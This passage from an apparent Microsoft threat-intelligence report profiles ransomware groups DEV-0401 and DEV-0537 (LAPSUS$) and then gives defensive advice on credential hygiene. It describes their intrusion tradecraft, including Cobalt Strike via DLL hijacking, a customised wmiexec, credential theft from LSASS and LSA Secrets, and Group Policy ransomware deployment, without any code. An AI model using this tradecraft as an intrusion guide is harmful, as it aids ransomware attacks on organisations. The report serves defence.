their group, which could discourage payment due to their sanctioned status. \n\nFigure 6. The handover from DEV-0206 to DEV-0243\n\n### DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n\nDiffering from the other RaaS developers, affiliates, and access brokers profiled here, DEV-0401 appears to be an activity group involved in all stages of their attack lifecycle, from initial access to ransomware development. Despite this, they seem to take some inspiration from successful RaaS operations with the frequent rebranding of their ransomware payloads. Unique among human-operated ransomware threat actors tracked by Microsoft, DEV-0401 [is confirmed to be a China-based activity group.](<https://twitter.com/MsftSecIntel/status/1480730559739359233>)\n\nDEV-0401 differs from many of the attackers who rely on purchasing access to existing malware implants or exposed RDP to enter a network. Instead, the group heavily utilizes unpatched vulnerabilities to access networks, including vulnerabilities in Exchange, Manage Engine AdSelfService Plus, Confluence, and [Log4j 2](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). Due to the nature of the vulnerabilities they preferred, DEV-0401 gains elevated credentials at the initial access stage of their attack.\n\nOnce inside a network, DEV-0401 relies on standard techniques such as using Cobalt Strike and WMI for lateral movement, but they have some unique preferences for implementing these behaviors. Their Cobalt Strike Beacons are frequently launched via DLL search order hijacking. While they use the common Impacket tool for WMI lateral movement, they use a customized version of the _wmiexec.py_ module of the tool that creates renamed output files, most likely to evade static detections. Ransomware deployment is ultimately performed from a batch file in a share and Group Policy, usually written to the NETLOGON share on a Domain Controller, which requires the attackers to have obtained highly privileged credentials like Domain Administrator to perform this action.\n\nFigure 7. Ransomware payloads distributed by DEV-0401 between 2021 and April 2022\n\nBecause DEV-0401 maintains and frequently rebrands their own ransomware payloads, they can appear as different groups in payload-driven reporting and evade detections and actions against them. Their payloads are sometimes rebuilt from existing for-purchase ransomware tools like Rook, which shares code similarity with the Babuk ransomware family. In February of 2022, DEV-0401 was observed deploying the Pandora ransomware family, primarily via unpatched VMware Horizon systems vulnerable to the [Log4j 2 CVE-2021-44228 vulnerability](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>).\n\nLike many RaaS operators, DEV-0401 maintained a leak site to post exfiltrated data and motivate victims to pay, however their frequent rebranding caused these systems to sometimes be unready for their victims, with their leak site sometimes leading to default web server landing pages when victims attempt to pay. In a notable shift\u2014possibly related to victim payment issues\u2014DEV-0401 started deploying LockBit 2.0 ransomware payloads in April 2022.\n\n### DEV-0537: From extortion to destruction\n\nAn example of a threat actor who has moved to a pure extortion and destruction model without deploying ransomware payloads is an activity group that Microsoft tracks as DEV-0537, also known as LAPSUS$. Microsoft has detailed DEV-0537 actions taken in early 2022 [in this blog](<https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/>). DEV-0537 started targeting organizations mainly in Latin America but expanded to global targeting, including government entities, technology, telecom, retailers, and healthcare. Unlike more opportunistic attackers, DEV-0537 targets specific companies with an intent. Their initial access techniques include exploiting unpatched vulnerabilities in internet-facing systems, searching public code repositories for credentials, and taking advantage of weak passwords. In addition, there is evidence that DEV-0537 leverages credentials stolen by the Redline password stealer, a piece of malware available for purchase in the cybercriminal economy. The group also buys credentials from underground forums which were gathered by other password-stealing malware.\n\nOnce initial access to a network is gained, DEV-0537 takes advantage of security misconfigurations to elevate privileges and move laterally to meet their objectives of data exfiltration and extortion. While DEV-0537 doesn\u2019t possess any unique technical capabilities, the group is especially cloud-aware. They target cloud administrator accounts to set up forwarding rules for email exfiltration and tamper with administrative settings on cloud environments. As part of their goals to force payment of ransom, DEV-0537 attempts to delete all server infrastructure and data to cause business disruption. To further facilitate the achievement of their goals, they remove legitimate admins and delete cloud resources and server infrastructure, resulting in destructive attacks. \n\nDEV-0537 also takes advantage of cloud admin privileges to monitor email, chats, and VOIP communications to track incident response efforts to their intrusions. DEV-0537 has been observed on multiple occasions to join incident response calls, not just observing the response to inform their attack but unmuting to demand ransom and sharing their screens while they delete their victim\u2019s data and resources.\n\n## Defending against ransomware: Moving beyond protection by detection\n\nA durable security strategy against determined human adversaries must include the goal of mitigating classes of attacks and detecting them. Ransomware attacks generate multiple, disparate security product alerts, but they could easily get lost or not responded to in time. Alert fatigue is real, and SOCs can make their lives easier by looking at trends in their alerts or grouping alerts into incidents so they can see the bigger picture. SOCs can then mitigate alerts using hardening capabilities like attack surface reduction rules. Hardening against common threats can reduce alert volume and stop many attackers before they get access to networks. \n\nAttackers tweak their techniques and have tools to evade and disable security products. They are also well-versed in system administration and try to blend in as much as possible. However, while attacks have continued steadily and with increased impact, the attack techniques attackers use haven\u2019t changed much over the years. Therefore, a renewed focus on prevention is needed to curb the tide.\n\nRansomware attackers are motivated by easy profits, so adding to their cost via security hardening is key in disrupting the cybercriminal economy.\n\n### Building credential hygiene\n\nMore than malware, attackers need credentials to succeed in their attacks. In almost all attacks where ransomware deployment was successful, the attackers had access to a domain admin-level account or local administrator passwords that were consistent throughout the environment. Deployment then can be done through Group Policy or tools like PsExec (or clones like PAExec, CSExec, and WinExeSvc). Without the credentials to provide administrative access in a network, spreading ransomware to multiple systems is a bigger challenge for attackers. Compromised credentials are so important to these attacks that when cybercriminals sell ill-gotten access to a network, in many instances, the price includes a guaranteed administrator account to start with.\n\nCredential theft is a common attack pattern. Many administrators know tools like Mimikatz and LaZagne, and their capabilities to steal passwords from interactive logons in the LSASS process. Detections exist for these tools accessing the LSASS process in most security products. However, the risk of credential exposure isn\u2019t just limited to a domain administrator logging in interactively to a workstation. Because attackers have accessed and explored many networks during their attacks, they have a deep knowledge of common network configurations and use it to their advantage. One common misconfiguration they exploit is running services and scheduled tasks as highly privileged service accounts.\n\nToo often, a legacy configuration ensures that a mission-critical application works by giving the utmost permissions possible. Many organizations struggle to fix this issue even if they know about it, because they fear they might break applications. This configuration is especially dangerous as it leaves highly privileged credentials exposed in the LSA Secrets portion of the registry, which users with administrative access can access. In organizations where the local administrator rights haven\u2019t been removed from end users, attackers can be one hop away from domain admin just from an initial attack like a banking trojan. Building credential hygiene is developing a logical segmentation of the network, based on privileges, that can be implemented alongside network segmentation to limit lateral movement.\n\n**Here are some steps organizations can take to build credential hygiene:**\n\n * Aim to run services as Local System when administrative privileges are needed, as this allows application